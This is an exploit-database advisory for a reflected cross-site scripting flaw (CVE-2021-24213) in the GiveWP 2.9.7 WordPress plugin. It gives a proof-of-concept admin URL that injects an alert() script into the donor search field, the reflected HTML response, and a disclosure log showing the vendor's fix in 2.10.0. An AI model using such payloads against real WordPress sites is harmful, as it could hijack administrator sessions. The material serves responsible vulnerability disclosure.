id: 36018
date: 03/23/2021
title: WordPress GiveWP 2.9.7 Cross Site Scripting Vulnerability
author: Austin Bentley
cves: CVE-2021-24213

# Exploit Title: GiveWP 2.9.7 Reflected Cross-Site Scripting
# Exploit Author: Austin Bentley
# Vendor Homepage: https://givewp.com/
# Software Link: https://wordpress.org/plugins/give/
# Version: 2.9.7
# Tested on: Windows 7
# CVE: CVE-2021-24213
Exploitation requirements: Admin must visit payload URL. Default config.
Tested on: GiveWP 2.9.7, Wordpress 5.7, XAMPP 7.4.16, Firefox 86.0.1. Default configs on all products.
Vulnerable since: 2.4.0, Jan 16th 2019, commit 097c4d0ab964493776950381ed64498040395f6b
Active Installations: 100,000+ per https://wordpress.org/plugins/give/
Researcher: Austin Bentley (https://bentl.ee/)
Detailed writeup available at httpS://bentl.ee/posts/cve-givewp/

PoC URL:
http://localhost/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors

Response:
--- SNIP ---
<div class="give-donor-search-box">
  <input type="text" id="give-donors-search-input" placeholder="Name, Email, or Donor ID" name="s" value="\"><script>alert(0)</script>">
  <input type="submit" class="button" value="Search" ID="donor-search-submit"  />
</div>
--- SNIP ---


Disclosure Log:
3/21/2021 -- Emailed GiveWP for security contact information
3/22/2021 -- WPScan CNA issued CVE-2021-24213 (un-released)
3/22/2021 -- Provided vendor with PoC
3/22/2021 -- Vendor provided fix in 2.10.0
3/23/2021 -- Fix validated, article posted, CVE unlocked

#  0day.today [2023-03-27]  #